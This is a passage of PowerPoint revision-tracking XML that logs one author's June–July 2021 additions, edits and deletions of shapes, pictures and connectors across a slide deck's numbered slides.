        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:37:48.464" v="1870"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1984469485" sldId="437"/>
            <ac:spMk id="9" creationId="{94F87AB4-37E5-485C-9B88-9885C608EBDE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:38:18.240" v="1901" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1984469485" sldId="437"/>
            <ac:spMk id="10" creationId="{DFF63605-0712-4C86-A936-89CE999AB4C3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:34:58.524" v="1854" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1984469485" sldId="437"/>
            <ac:picMk id="6" creationId="{760F1196-A840-4624-B2B2-E9EFA8D52BCC}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod modCrop">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:37:48.069" v="1868" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1984469485" sldId="437"/>
            <ac:picMk id="8" creationId="{EC0AC333-404F-45A9-A1D9-FF0B46834F68}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:38:24.875" v="1903" actId="13822"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1984469485" sldId="437"/>
            <ac:cxnSpMk id="12" creationId="{863E9DBD-30D0-4A5F-8CB1-03E819F279E3}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:38:33.205" v="1905" actId="13822"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1984469485" sldId="437"/>
            <ac:cxnSpMk id="14" creationId="{F2B8D4FC-7423-47FC-85FD-6793590CC410}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:42:20.128" v="1966" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4198334412" sldId="438"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:40:24.925" v="1907"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4198334412" sldId="438"/>
            <ac:spMk id="2" creationId="{0F57E0AC-3CAE-486A-97DE-98D5635B71F8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:42:20.128" v="1966" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4198334412" sldId="438"/>
            <ac:picMk id="4" creationId="{81B87CC8-C95A-4AE6-BB0F-470F40A10D53}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:45:55.971" v="1971" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4192281943" sldId="439"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:43:39.922" v="1968"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4192281943" sldId="439"/>
            <ac:spMk id="2" creationId="{FD81338F-CC6C-4B88-AEEA-CCC70DDFAF40}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:45:55.971" v="1971" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4192281943" sldId="439"/>
            <ac:picMk id="4" creationId="{445027BD-094C-49DA-98C0-3A6BFB601AB1}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:47:33.949" v="2031" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3098642995" sldId="440"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:47:11.354" v="2029" actId="114"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3098642995" sldId="440"/>
            <ac:spMk id="2" creationId="{4B9E07AD-0E48-42E3-9591-B5AE043AF808}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:47:33.949" v="2031" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3098642995" sldId="440"/>
            <ac:picMk id="4" creationId="{9BB225AD-15B5-49EB-B29B-02AE10DCCDE1}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:55:21.260" v="2063" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3265397422" sldId="441"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:54:51.260" v="2058" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3265397422" sldId="441"/>
            <ac:spMk id="2" creationId="{9DA01E7A-853C-4CE3-8014-CAB69AA8C9FC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:55:21.260" v="2063" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3265397422" sldId="441"/>
            <ac:picMk id="4" creationId="{808FB4A1-936E-4CF1-9771-992D07621234}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T12:24:10.779" v="2095" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4060643725" sldId="442"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T12:24:06.547" v="2093" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4060643725" sldId="442"/>
            <ac:spMk id="2" creationId="{20FBEB77-566B-4168-AE3D-9FC3F636FF57}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T12:24:10.779" v="2095" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4060643725" sldId="442"/>
            <ac:spMk id="3" creationId="{F895820A-133A-4CBD-BD17-4AFBF584A4F7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T12:24:06.547" v="2093" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4060643725" sldId="442"/>
            <ac:spMk id="4" creationId="{B94316E1-ED0F-467D-A861-5A01B548D9B3}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T14:07:48.913" v="2177" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3308258886" sldId="443"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T12:28:26.907" v="2097" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3308258886" sldId="443"/>
            <ac:spMk id="2" creationId="{CF7DD7EC-B96E-472D-B626-FDADB606847A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T12:28:26.907" v="2097" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3308258886" sldId="443"/>
            <ac:spMk id="3" creationId="{3AD4E54B-820F-4B9E-A899-D7E93E790FA2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T14:07:48.913" v="2177" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3308258886" sldId="443"/>
            <ac:spMk id="4" creationId="{65CC9643-7F3F-463E-BF81-2F26A95275A9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T13:56:49.188" v="2136" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3308258886" sldId="443"/>
            <ac:spMk id="5" creationId="{B24A83FB-DEBB-4361-B724-7FA73E0761CC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod modCrop">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T14:07:08.878" v="2166" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3308258886" sldId="443"/>
            <ac:picMk id="7" creationId="{E8077A86-6177-46F8-BC1A-EDC9365A5232}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T14:06:48.090" v="2160" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3308258886" sldId="443"/>
            <ac:picMk id="9" creationId="{35F65AE4-C97A-4F88-B746-96D76D9ADFD4}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T14:07:08.074" v="2165" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3308258886" sldId="443"/>
            <ac:picMk id="11" creationId="{0654CF8C-0926-4977-8FF1-FB95795DA4F1}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T14:09:05.312" v="2218" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2290480652" sldId="444"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T14:08:11.656" v="2213" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2290480652" sldId="444"/>
            <ac:spMk id="2" creationId="{AA7928D3-98DF-4D45-93B0-F0E2F43E5412}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T14:09:05.312" v="2218" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2290480652" sldId="444"/>
            <ac:picMk id="4" creationId="{93C75D7E-9E4C-47EB-9B1A-F446917E7AD6}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T14:29:01.031" v="2277" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1737777844" sldId="445"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T14:21:07.410" v="2260" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1737777844" sldId="445"/>
            <ac:spMk id="2" creationId="{761FC423-5121-4249-BCEF-8E4C81F7B249}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T14:29:01.031" v="2277" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1737777844" sldId="445"/>
            <ac:picMk id="4" creationId="{B439B6F3-D834-447A-815F-2F2CD9529B1F}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T14:28:58.759" v="2276" actId="1440"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1737777844" sldId="445"/>
            <ac:picMk id="6" creationId="{A20873FE-3DD1-4167-AE3F-1AFB4EC7F850}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T14:32:54.680" v="2383" actId="114"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2625291343" sldId="446"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T14:32:54.680" v="2383" actId="114"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2625291343" sldId="446"/>
            <ac:spMk id="2" creationId="{8BF062BD-790B-4A8A-A964-AFADDB9ABAE7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T14:32:12.519" v="2342" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2625291343" sldId="446"/>
            <ac:spMk id="7" creationId="{53976C66-44D4-428F-B5B4-989D503B6992}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T14:32:33.196" v="2368" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2625291343" sldId="446"/>
            <ac:spMk id="8" creationId="{9C3F71E9-3EB9-421E-9264-F5CB6D03832C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T14:31:45.996" v="2301" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2625291343" sldId="446"/>
            <ac:picMk id="4" creationId="{6755E551-E525-4778-A07B-F29E5BC5CB06}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T14:31:36.777" v="2298" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2625291343" sldId="446"/>
            <ac:picMk id="6" creationId="{86091216-7469-46ED-95F0-405F871469F2}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}"/>
    <pc:docChg chg="addSld delSld modSld">
      <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-07-01T14:18:37.659" v="55" actId="6549"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:38:19.716" v="0"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1325061211" sldId="256"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:38:19.716" v="0"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1325061211" sldId="256"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2616338024" sldId="373"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:23.201" v="12" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2789471632" sldId="392"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:28.988" v="22" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2467691949" sldId="394"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:29.667" v="26" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1635951812" sldId="396"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:30.660" v="31" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3665038014" sldId="404"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:32.953" v="39" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2489270501" sldId="411"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:33.208" v="40" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3118374455" sldId="414"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:30.420" v="30" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4266318337" sldId="416"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:33.801" v="41" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4247754591" sldId="418"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3782016356" sldId="428"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:23.068" v="11" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4091828154" sldId="430"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:21.235" v="2" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="593614233" sldId="431"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:32.187" v="36" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2829655940" sldId="434"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:37.137" v="49" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4105321355" sldId="439"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:40.112" v="50" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1827660371" sldId="440"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:40:41.177" v="51" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="117761190" sldId="441"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
